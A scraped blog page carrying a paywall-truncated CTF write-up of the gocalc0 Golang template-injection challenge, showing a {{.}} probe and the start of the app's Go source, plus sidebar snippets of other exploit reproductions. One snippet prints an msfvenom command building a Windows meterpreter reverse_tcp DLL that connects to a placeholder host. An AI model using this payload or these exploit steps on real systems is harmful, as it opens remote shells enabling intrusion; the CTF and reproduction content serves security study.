[VNCFT2021]gocalc0复现

于 2022-04-10 16:18:04 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 程序员 网络 漏洞 文章标签: 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hbohan/article/details/124078961
版权
本文介绍了[VNCFT2021]gocalc0题目复现,探讨了如何利用Golang SSTI漏洞获取flag。文章详细分析了源码,展示了如何通过session获取存储在cookie中的加密flag。最后,通过简化代码和理解Gin框架的响应机制,发现可以直接通过渲染响应获取到flag,无需额外编写exploit。
摘要由CSDN通过智能技术生成

[VNCFT2021]gocalc0复现

这道题当时出了非预期,session两次base64就能getflag,但是这道题本身的考点是Golang SSTI

正好复盘学习一下

打开题目能看到经典计算器

点开flag在这里发现只有短短一行提示

flag is in your session

这里按照非预期接还是能够拿到flag

但是我们要看一下具体按照预期方法怎么能拿到flag

https://www.jianshu.com/p/e0ffb76ba7e9

【查看相关资料】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

这里我们通过{ {.}}查看一下作用域

整理一下,就能够看到整个calc的源码

package main
 
import (
    _ "embed"
    "fmt"
    "os"
    "reflect"
    "strings"
    "text/template"
 
    "github.com/gin-contrib/sessions"
    "github.com/gin-contrib/sessions/cookie"
    "github.com/gin-gonic/gin"
    
最低0.47元/天 解锁文章
IT老涵
关注
专栏目录
CVE-2021-40444 复现
问题很多的小明
09-20 1572
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档 复现环境:Ubuntu + WIN10 利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444 0x01 生成恶意dll : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll 需要提前下载lcab库 .
Gocalc:Go上的简单计算器!
04-07
Gocalc Go中的简单计算器! 安装 go get github.com/Rollylni/Gocalc 例子 package example import ( "fmt" gocalc "github.com/Rollylni/Gocalc" ) func calc ( input string ) { calc := gocalc . NewCalculator ( input ) res , err := calc . Process () if err != nil { fmt . Println ( err ) } else { fmt . Println ( res ) } } func main () { calc ("2 + 2 * 2) c
VNCTF2022公开赛 Web gocalc0
cadandme的博客
02-13 693
粗心大意要不得
Go Calc 第一个例子
chengpaoyao0636的博客
10-04 160
代码结构如下: calc/ └── src ├── calc │ └── calc.go ├── hello.go └── mymath ├── add.go └── sqrt.go ...
VNCTF2022 [WEB]
weixin_43610673的博客
02-16 893
GameV4.0 flag在data.js源码中 base64解码即可 gocalc0 随便发点payload测试下发现返回的session解码就有flag了 预期解:https://blog.csdn.net/cosmoslin/article/details/122930836 newcalc0 使得Object.prototype这条件达成即可获取flag 猜测原型链污染 这里还有console.log 使用cve-2022-21824 console.table([{x:1}], ["__pr
CVE-2021-36934复现
热门推荐
江左盟的博客
07-24 1万+
漏洞简介 微软在7月20日发布紧急安全公告,公开了一个Windows提权漏洞。由于对多个系统文件(包括安全帐户管理器 (SAM) 数据库)的访问控制列表 (ACL) 过于宽松,攻击者可读取SAM,SYSTEM,SECURITY等文件内容,进而获取用户NTLM Hash值,从而通过解密Hash值或Hash传递等方法造成特权提升漏洞。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。 影响范围 微软确认此问题会影响 Windows 10 版本 1809 和更新的操作系统,其他版本还在确认中。 环境
apache-cve_2021_41773 复现
YouthBelief的博客
11-05 1730
apache-cve_2021_41773 复现apache-cve_2021_41773 复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现手工复现0x04 漏洞修复 apache-cve_2021_41773 复现 Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。 0x01 漏洞描述 2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。
cve-2021-1675复现
Shanfenglan's blog
07-08 1841
文章目录1. 参考文章2. 环境配置2.1 samba配置2.2 特殊的impacket配置3. 漏洞复现3.1 使用msf生成恶意dll并开启监听3.2 上传恶意dll到共享文件夹内3.3 使用exp进行利用4. 利用成果: 1. 参考文章 CentOS7搭建Samba共享文件夹 设置无密码登录 exp: cube0x0/CVE-2021-1675 2. 环境配置 2.1 samba配置 需要有一台linux机器,配置可无密码访问的共享文件夹。 下载samba: apt-get install samba
CVE-2021-40444漏洞复现
1ance's blog
09-25 3611
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
11-24
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
微信 0day漏洞复现
星落的博客
04-19 1万+
目录 漏洞简介 影响版本 CS安装 漏洞复现 修复建议 漏洞简介 由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限 影响版本 <=3.2.1.141(Windows系统) CS安装 下载地址链接:https://pan.baidu.com/s/19En7Pkz7HIeey82PUvEBwQ 提取码:fczw 在ka...
通过蜜罐技术获取攻击者手机号、微信号【网络安全
HBohan的博客
03-04 1万+
蜜罐是对攻击者的欺骗技术,用以监视、检测、分析和溯源攻击行为,其没有业务上的用途,所有流入/流出蜜罐的流量都预示着扫描或者攻击行为,因此可以比较好的聚焦于攻击流量。
网络安全】新型网络犯罪攻防技术研究
HBohan的博客
10-20 8936
前言 ​ 大家好,我是风起。本次带来的是对于新型网络犯罪的渗透研究,区别于常规的渗透测试任务,针对该类站点主要核心不在于找出尽可能多的安全隐患,更多的聚焦于 数据 这个概念。值得注意的是,这里的数据更多时候指的是:代理身份、后台管理员身份、受害人信息、后台数据、 消费凭证 等信息。总的来说,一切的数据提取都是为了更好的落实团伙人员的身份信息。 ​ 所以无论是获取权限后的水坑钓鱼还是拿到数据库权限后提取信息亦或者提取镜像数据的操作都是在这个基础之上的。本文将以深入浅出的方式对渗透该类犯罪站点时的一些注意事项.
【内网渗透工具】炫彩蛇安装教程
HBohan的博客
11-10 7828
点击查看【学习资料】 Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper通过模块的方式落地MITRE ATT&CK中的常用技术.当前已集成55个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类. Viper可以帮助你以直观/可视化的方式使用metasploit-framework. 项目地址:https://github.com/Funn
SQLite 数据库注入总结
HBohan的博客
10-09 6356
前言 SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置。SQLite 与 MySQL 还是有些区别的,SQLite 直接读写普通磁盘文件,每一个数据库就是一个文件,可以按应用程序需求进行静态或动态连接其存储文件进行数据操作。 SQLite 基础 在本篇文章中我们使用 SQLite3 来学习,SQLite3 的语法与 MySQL 相似。详细语法可以在这里学习:https://www.r
【技术分享】如何解锁高通骁龙660上的安卓引导加载程序
HBohan的博客
08-17 6234
本文是我们在DEF CON 29大会上的演示视频的配套文章,视频的链接地址为https://www.youtube.com/watch?v=z4gIxdFfJDg。 要想在安卓手机上获得root权限,通常需要解锁引导加载程序,禁用手机的签名验证,这样的话,我们就可以部署一个修改过的安卓引导映像了。在Qualcomm芯片组上,这是一个标准化的过程,可以使用安卓引导加载程序中的命令来执行解锁。智能手机制造商经常修改引导加载程序以增加特定的限制,但是,这通常要求使用他们自家的工具。 这些自定义的限制通常包括:.
网络安全就业有什么要求?可算来了,给大家了解一下网络安全就业篇学习大纲
HBohan的博客
09-09 6182
前言 网络安全工程师又叫信息安全工程师。随着互联网发展和IT技术的普及,网络和IT已经日渐深入到日常生活和工作当中,社会信息化和信息网络化,突破了应用信息在时间和空间上的障碍,使信息的价值不断提高。但是与此同时,网页篡改、计算机病毒、系统非法入侵、数据泄密、网站欺骗、服务瘫痪、漏洞非法利用等信息安全事件时有发生。 主要负责信息安全管理体系和标准工作,防范黑客入侵并进行分析和防范,通过运用各种安全产品和技术,设置防火墙、防病毒、IDS、PKI、攻防技术等。进行安全制度与安全技术规划、日常维护管理、信息安全检查
CVE-2021-28041复现
最新发布
03-13
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受影响的软件或系统版本:首先,你需要确定你使用的软件或系统是否受到CVE-2021-28041漏洞的影响。可以查看相关厂商或组织发布的安全公告或漏洞报告来获取这些信息。 2. 了解漏洞的详细信息:阅读CVE-2021-28041漏洞的详细描述和相关文档,了解漏洞的原理和影响范围。这将帮助你更好地理解漏洞,并为复现做好准备。 3. 搭建实验环境:在一个安全的环境中,搭建一个与受影响软件或系统版本相匹配的实验环境。这可以是一个虚拟机、容器或者专门用于安全测试的实验环境。 4. 复现漏洞:根据漏洞的描述和相关文档,尝试复现CVE-2021-28041漏洞。这可能涉及到构造特定的输入、触发特定的操作或者利用软件或系统中的某个弱点。 5. 验证漏洞:一旦成功复现漏洞,验证漏洞的存在和影响。这可以通过观察系统行为、获取敏感信息或者执行未授权的操作来进行验证。 请注意,复现漏洞是一项敏感的活动,需要在合法授权和合法范围内进行。在进行任何安全测试之前,请确保你已经获得了相关授权,并遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值